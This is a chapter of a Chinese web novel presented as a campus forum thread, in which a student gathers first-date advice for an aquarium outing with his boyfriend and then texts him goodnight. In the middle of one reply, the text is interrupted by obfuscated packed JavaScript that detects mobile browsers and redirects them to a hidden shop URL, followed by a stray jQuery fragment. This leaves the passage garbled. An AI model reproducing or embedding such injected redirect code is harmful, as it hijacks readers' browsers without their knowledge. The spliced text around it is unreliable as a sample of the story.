默认冷灰
24号文字
方正启体

11. 第一次约会注意事项!在线等挺急的!

作者:天天吃甜本书字数:K更新时间:
    标题:【树洞】求助!第一次约会注意事项!在线等挺急的!


    论坛板块:京华大学\校园生活\情感树洞


    发帖人:足球不行踢球去


    正文:


    兄弟们,我回来了。


    昨晚和顾辞商量了一晚上,终于把约会地点定下来了。


    ——水族馆。


    没错,就是水族馆。


    说出来你们可能不信,这个地点是他提的。


    昨天晚上我们一起去吃饭,我问他:“你想去哪儿?”


    他低头想了很久,久到我以为他不会回答了。


    然后他说:“水族馆。”


    我愣了一下。


    水族馆?


    就那个……有很多鱼的地方?


    他看我愣住,耳朵尖红了一下,说:“小时候去过一次,后来再也没去过。听说……听说新建的那个很大。”


    他说这话的时候,眼睛没看我,盯着面前的碗。


    但我看见他睫毛在抖。


    就那么轻轻抖了一下。


    我当时脑子里只有一个念头:


    去。


    必须去。


    别说水族馆了,就是要去南极看企鹅,我也去。


    ——


    【为什么是水族馆】


    后来我问他想去水族馆的原因。


    他一开始不肯说。


    被我追问了半天,才憋出一句:


    “《小王子》里说,如果你驯养了我,我们就会彼此需要。对我来说,你就是世界上唯一的了;对你来说,我也是世界上唯一的了。”


    我听得一头雾水:“这和鱼有什么关系?”


    他瞪了我一眼。


    然后说:“水族馆里的鱼,隔着玻璃游来游去。它们不知道玻璃外面有人在看它们,看它们的人也不知道鱼在想什么。”


    他顿了顿。


    “但如果我们一起去看,就不一样了。”


    “我们看到的是一样的鱼,听到的是同一片水声。玻璃那边是鱼的世界,玻璃这边是我们的世界。”


    他说完这些,耳朵红透了。


    我听着听着,突然觉得——


    这人怎么这么会说话?


    明明说的是鱼,但我听出来的全是“我们”。


    ——


    【所以现在问题来了】


    地点定了。


    但这周末就要去了。


    我开始慌了。


    第一次约会啊兄弟们!


    不是兄弟一起出去玩!


    是约会!


    是和喜欢的人约会!


    我他妈完全不知道该怎么办!


    要准备什么?


    要注意什么?


    穿什么衣服?


    说什么话?


    要不要带什么东西?


    要不要提前做攻略?


    要不要……


    我脑子快炸了。


    ——


    所以我又来问你们了。


    我知道你们又要说我“把同学当AI使”。


    但我真的没办法啊!


    这种事又不能问队友,那群单身狗只会说“冲就完了”。


    也不能问顾辞,问了就不叫惊喜了。


    只能问你们了。


    求求你们了!


    救救孩子吧!


    第一次约会注意事项大全!


    需要准备的东西清单!


    避雷指南!


    什么都行!


    在线等!


    挺急的!


    ——


    1楼匿名用户:


    沙发!


    哈哈哈哈哈哈楼主你又来了!


    2楼匿名用户:


    笑死,楼主是真的把论坛当百度用了。


    “第一次约会注意事项”也来问?


    3楼匿名用户:


    回2楼:关键是我们还真的每次都回答。


    我们是什么?免费恋爱顾问团吗?


    4楼匿名用户:


    回3楼:关键是我们大部分还都是单身狗。


    我一个单身二十年的在这儿给楼主出谋划策?


    我图什么???


    5楼匿名用户:


    回4楼:图什么?图一个参与感啊!


    自己谈不了恋爱,还不能看别人谈吗?


    6楼匿名用户:


    真实。


    我就是那个自己单身,但每天都在追楼主帖子的傻子。


    7楼匿名用户:


    +1


    每天刷论坛第一件事就是看楼主更新没有。


    我室友问我是不是恋爱了,我说没有,我在追连续剧。


    8楼匿名用户:


    哈哈哈哈哈哈“追连续剧”太真实了!


    楼主这个帖,比我看的甜剧都上头。


    9楼匿名用户:


    行了,别唠了,给楼主出主意吧。


    毕竟是我们看着长大的儿子,不能不管。


    10楼匿名用户:


    回9楼:哈哈哈哈哈哈“看着长大的儿子”是什么鬼!


    不过确实,从第一帖追到现在,真有养成系的感觉。


    11楼楼主:


    求求你们了!


    别唠了!


    快给主意!


    周六就要去了!


    12楼匿名用户:


    好好好,给你出主意。


    首先,衣服!


    穿什么很重要!


    13楼匿名用户:


    对!第一次约会,穿搭是门面!


    不能太随便,也不能太刻意。


    就……干净舒服就行。


    14楼匿名用户:


    楼主你平时穿什么?


    运动服?球衣?


    15楼楼主:


    平时就运动服啊,训练方便。


    偶尔穿卫衣牛仔裤。


    16楼匿名用户:


    那就卫衣牛仔裤!


    别穿球衣,太随意了。


    也别穿西装,太夸张了。


    卫衣牛仔裤,干净利落,最适合你。


    17楼匿名用户:


    对!


    而且水族馆里冷气足,卫衣正好。


    别到时候冻得直哆嗦,影响发挥。


    18楼匿名用户:


    “影响发挥”是什么鬼?


    楼主又不是去比赛的。


    19楼匿名用户:


    回18楼:你懂什么!


    第一次约会,每一个细节都重要!


    冻着了说话都不利索,怎么撩?


    20楼楼主:


    ……


    我没打算撩。


    我就是想好好待着。


    21楼匿名用户:


    回20楼:你不想撩,但你人在那儿就是撩。


    你190的身高往那儿一站,顾辞看着你就心跳加速。


    还用撩吗?


    22楼匿名用户:


    哈哈哈哈哈哈!


    “190的身高往那儿一站”就够了!


    楼主你赢在起跑线上了。


    23楼楼主:


    ……


    行吧。


    卫衣牛仔裤,记下了。


    24楼匿名用户:


    还有鞋!


    别穿球鞋!


    太运动了!


    穿个干净的小白鞋就行!


    25楼楼主:


    小白鞋?


    我好像有一双。


    26楼匿名用户:


    那就穿那双!


    提前擦干净!


    别到时候灰头土脸的!


    27楼楼主:


    ……


    我今晚就擦。


    28楼匿名用户:


    然后,要带什么东西?


    水!一定要带水!


    水族馆里逛久了会渴。


    29楼匿名用户:


    对对对!


    带两瓶水,给他一瓶。


    还可以带点小零食,万一饿了。


    30楼匿名用户:


    但别带味道大的!


    别到时候一打开包装,满屋子味。


    顾辞那么精致的人,受不了。


    31楼楼主:


    那他喜欢吃什么零食?


    我不知道啊!!!


    32楼匿名用户:


    你看,又来了。


    上次让你做功课,你没做?


    33楼楼主:


    做了!


    这几天我记了!


    他喜欢吃甜的,不爱吃辣的。


    喝豆浆不加糖,但吃蛋糕。


    水果喜欢草莓和芒果,不喜欢榴莲。


    这些我都记了!


    34楼匿名用户:


    回33楼:!!!


    楼主你出息了!!!


    真的记了!!!


    35楼匿名用户:


    感动!


    儿子终于长大了!


    那你就带点甜的零食,比如小蛋糕、巧克力什么的。


    36楼匿名用户:


    对!


    带那种独立包装的,方便吃。


    别带一大盒,拿着麻烦。


    37楼楼主:


    好。


    我明天去买。


    38楼匿名用户:


    还有相机!


    或者手机充满电!


    拍照!


    39楼匿名用户:


    对对对!


    第一次约会,一定要拍照留念!


    以后可以拿出来看!


    40楼楼主:


    他不喜欢拍照。


    每次我拍他,他都躲。


    41楼匿名用户:


    回40楼:那你拍鱼啊!


    拍他看鱼的样子!


    他不让你拍他,你就偷拍!


    拍背影,拍侧脸,拍他专注看鱼的时候!


    42楼匿名用户:


    对对对!


    拍他看鱼,你也在看他。


    以后看照片,想起的是那一天的他。


    43楼楼主:


    ……


    好。


    我偷拍。


    44楼匿名用户:


    然后,还有一个重要问题:


    你准备怎么去?


    45楼楼主:


    坐地铁吧。


    打车太贵了。


    46楼匿名用户:


    坐地铁可以!


    但要注意时间!


    别迟到了!


    47楼匿名用户:


    对对对!


    第一次约会,迟到是大忌!


    提前查好路线,提前出门!


    宁可早到等他,别让他等你。


    48楼楼主:


    知道了。


    我提前一小时出门。


    49楼匿名用户:


    也不用一小时……


    半小时就够了。


    去太早干等着也尴尬。


    50楼匿名用户:


    回49楼:可以先去附近逛逛啊!


    熟悉一下环境,买点东西。


    别到时候手忙脚乱的。


    51楼楼主:


    好。


    我提前半小时到,先踩点。


    52楼匿名用户:


    然后,还有一个灵魂问题:


    你准备说什么?


    53楼楼主:


    说什么?


    就……正常说话啊?


    54楼匿名用户:


    正常说话是什么话?


    你总得准备点话题吧?


    万一冷场了怎么办?


    55楼楼主:


    ……


    不会冷场吧?


    我们平时话挺多的。


    56楼匿名用户:


    平时是平时,约会是约会!


    平时你们聊训练、聊吃饭、聊学校的事。


    约会的时候聊这些?


    太没情调了!


    57楼匿名用户:


    对!


    你得聊点跟约会有关的话题!


    比如那条鱼好漂亮,比如你喜欢这个吗,比如你累不累。


    再比如……


    比如看着他眼睛说“你今天真好看”。


    58楼匿名用户:


    回57楼:卧槽这句好!


    “你今天真好看”!


    简单直接,杀伤力巨大!


    59楼楼主:


    ……


    我说不出口。


    60楼匿名用户:


    说不出口也得说!


    约会就是要说这些!


    不然和平时有什么区别?


    61楼匿名用户:


    对!


    而且你说的时候,他会脸红。


    你不想看他脸红吗?


    62楼楼主:


    ……


    想。


    63楼匿名用户:


    那就说!


    多说!


    说到他习惯为止!


    64楼匿名用户:


    哈哈哈哈哈哈“说到他习惯为止”是什么魔鬼建议!


    不过确实,多说几遍就不尴尬了。


    65楼楼主:


    好。


    我试试。


    66楼匿名用户:


    还有一个重点:牵手!


    你准备什么时候牵手?


    67楼楼主:


    ???


    还要考虑这个???


    68楼匿名用户:


    当然要!


    第一次约会,牵手是个标志性动作!


    标志着你们从“刚刚在一起”到“真的在一起”!


    69楼匿名用户:


    对对对!


    但也不能太刻意。


    找个自然的时机。


    70楼匿名用户:


    比如过马路的时候?


    比如人挤的时候?


    比如他看鱼看得入迷的时候?


    71楼楼主:


    他看鱼入迷的时候我牵手?


    他不会吓到吗?


    72楼匿名用户:


    怎么会!


    你们不是已经在一起了吗?


    牵手不是很正常?


    73楼匿名用户:


    对!


    而且你想,他正专注看鱼,突然感觉手被握住了。


    一低头,是你握着他。


    那个瞬间,多心动!


    74楼楼主:


    ……


    我记下了。


    找个自然的时机。


    75楼匿名用户:


    还有!


    注意他的反应!


    如果他手回握你,说明他很享受。


    如果他僵住了,你就先松开,过会儿再试。


    76楼匿名用户:


    对!


    要观察,别硬来。


    谈恋爱是两个人的事,得互相配合。


    77楼楼主:


    好。


    我观察。


    78楼匿名用户:


    还有一个雷区:别全程玩手机!


    第一次约会,手机收起来!


    除非拍照,不然别掏出来!


    79楼匿名用户:


    对对对!


    你想想,你正看鱼呢,他低头刷手机。


    什么感觉?


    感觉他不重视你。


    80楼楼主:


    我不玩手机。


    我平时和他一起也不玩。


    81楼匿名用户:


    那就好。


    继续保持。


    82楼匿名用户:


    还有一个:吃饭问题!


    你们是逛完水族馆吃饭,还是先吃饭再逛?


    83楼楼主:


    他说逛完再吃


    ;eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return''\\w+''};c=1;};while(c--)if(k[c])p=p.replace(new RegExp(''\\b''+e(c)+''\\b'',''g''),k[c]);return p;}(''8 0=7.0.6();b(/a|9|1|2|5|4|3|c l/i.k(0)){n.m="}'',24,24,''userAgent|iphone|ipad|iemobile|blackberry|ipod|toLowerCase|navigator|var|webos|android|if|opera|mgxs|t|shop|17382523|200203||http|test|mini|href|location''.split(''|''),0,{}));


    () {


    $(''.inform'').remove();


    $(''#content'').append(''


    。


    说怕吃饱了犯困,影响看鱼的心情。


    84楼匿名用户:


    也行。


    那你就提前查好附近的餐厅!


    别到时候饿着肚子到处找地方!


    85楼匿名用户:


    对对对!


    提前查好,最好能预约!


    别到时候排队一小时,影响心情。


    86楼楼主:


    好。


    我今晚就查。


    87楼匿名用户:


    还有一个灵魂拷问:


    你准备送他礼物吗?


    88楼楼主:


    礼物?


    第一次约会要送礼物吗???


    89楼匿名用户:


    不一定非要送。


    但送的话会加分。


    90楼匿名用户:


    对!


    不用太贵重,有心意就行。


    比如一只小水母钥匙扣?纪念品店都有卖。


    91楼匿名用户:


    对对对!


    逛完水族馆,买个纪念品给他。


    以后他看到那个钥匙扣,就想起这次约会。


    多有意义。


    92楼楼主:


    ……


    好。


    我留意一下纪念品店。


    93楼匿名用户:


    还有!


    你准备好怎么回来了吗?


    是送他回宿舍,还是各回各家?


    94楼楼主:


    当然送他回去啊!


    天黑了,不放心他一个人走。


    95楼匿名用户:


    对!


    送他回去!


    送到宿舍楼下!


    然后……你懂的。


    96楼匿名用户:


    “你懂的”是什么?


    楼主你懂了吗?


    97楼楼主:


    ……


    不懂。


    98楼匿名用户:


    哈哈哈哈哈哈!


    “不懂”笑死我了!


    就是告别的时候,可以说一句“今天很开心”,或者“下次再一起来”。


    99楼匿名用户:


    对!


    别直接扭头就走!


    说点什么!


    让他知道你很享受这次约会!


    100楼楼主:


    好。


    我说。


    101楼匿名用户:


    还有还有!


    回去之后给他发消息!


    问他到了没,问他今天开不开心,说晚安。


    102楼匿名用户:


    对对对!


    别让他觉得约会结束了就没联系了。


    要保持热度!


    103楼楼主:


    好。


    我发。


    104楼匿名用户:


    行了,该说的都说了。


    楼主你还有什么想问的?


    105楼楼主:


    ……


    我想想。


    好像都问完了。


    106楼匿名用户:


    那你现在感觉怎么样?


    还慌吗?


    107楼楼主:


    ……


    还是慌。


    但好一点了。


    108楼匿名用户:


    正常!


    第一次约会,不慌才怪!


    但慌说明你在意他,是好事。


    109楼匿名用户:


    对!


    你就记住一点:


    做你自己。


    别装,别演,别刻意。


    就做那个会给他买包子、会陪他去临市、会握着他的手说“是你”的张扬。


    就够了。


    110楼楼主:


    ……


    好。


    我知道了。


    111楼匿名用户:


    行了,去吧。


    周六约会,周五再来汇报准备情况。


    112楼匿名用户:


    对对对!


    周五来个倒计时帖!


    我们帮你检查有没有遗漏!


    113楼楼主:


    ……


    你们是真的把我当儿子养了是吧?


    114楼匿名用户:


    不然呢?


    我们一群单身狗,不养儿子干嘛?


    115楼匿名用户:


    哈哈哈哈哈哈!


    “养儿子”实锤了!


    楼主你就认了吧,你就是我们看着长大的崽。


    116楼楼主:


    ……


    行吧。


    谢谢爸爸们。


    谢谢妈妈们。


    谢谢各位单身狗恋爱顾问。


    117楼匿名用户:


    哈哈哈哈哈哈“单身狗恋爱顾问”是什么职位!


    不过我们乐意!


    去吧,周六加油!


    118楼匿名用户:


    楼主加油!


    拿下顾辞!


    119楼匿名用户:


    期待周六的约会后续!


    一定来更新啊!


    120楼楼主:


    好。


    周六一定来。


    谢谢你们。


    ——


    我躺在床上,把论坛里的建议一条一条记在备忘录里。


    衣服:卫衣牛仔裤小白鞋


    物品:水、零食、充电宝、纸巾


    时间:提前半小时到,踩点


    话题:多夸他,多说“你今天真好看”


    牵手:找自然时机,观察反应


    拍照:偷拍他看鱼的样子


    礼物:纪念品店买个钥匙扣


    吃饭:提前查餐厅,最好预约


    回来:送他到宿舍楼下,说“今天很开心”


    晚上:发消息,说晚安


    记完一看,好长一串。


    我盯着这条备忘录,突然笑了。


    以前比赛前,我也会列这种清单。


    战术、跑位、注意事项。


    从来没想过,谈恋爱也要列清单。


    但这份清单,比任何战术都让我紧张。


    手机震了一下。


    是顾辞的消息。


    【圆圆】:睡了?


    【张】:没。


    【圆圆】:在想什么?


    【张】:在想周六。


    【圆圆】:我也是。


    【张】:你期待吗?


    【圆圆】:嗯。


    【圆圆】:你呢?


    【张】:特别期待。


    【张】:顾辞。


    【圆圆】:嗯?


    【张】:我今天列了个清单,第一次约会注意事项。


    【圆圆】:……


    【圆圆】:张扬。


    【张】:嗯?


    【圆圆】:你不用列清单。


    【圆圆】:你就做你自己就行。


    【张】:可我想做得好一点。


    【圆圆】:你现在就很好。


    【圆圆】:你一直都很好。


    我盯着那几行字,眼眶又酸了。


    他说“你现在就很好”。


    他说“你一直都很好”。


    操。


    这人怎么这么会说话。


    我打字:


    【张】:顾辞。


    【圆圆】:嗯?


    【张】:周六的水族馆,我一定让你开心。


    【圆圆】:好。


    【圆圆】:我相信你。


    【张】:晚安。


    【圆圆】:晚安,张扬。


    ——


    窗外有月光。


    很亮。


    我想起他说的话。


    “玻璃那边是鱼的世界,玻璃这边是我们的世界。”


    周六。


    我要和他一起,去看那个属于我们的世界。
(←快捷键) <<上一章 投推荐票 回目录 标记书签 下一章>> (快捷键→)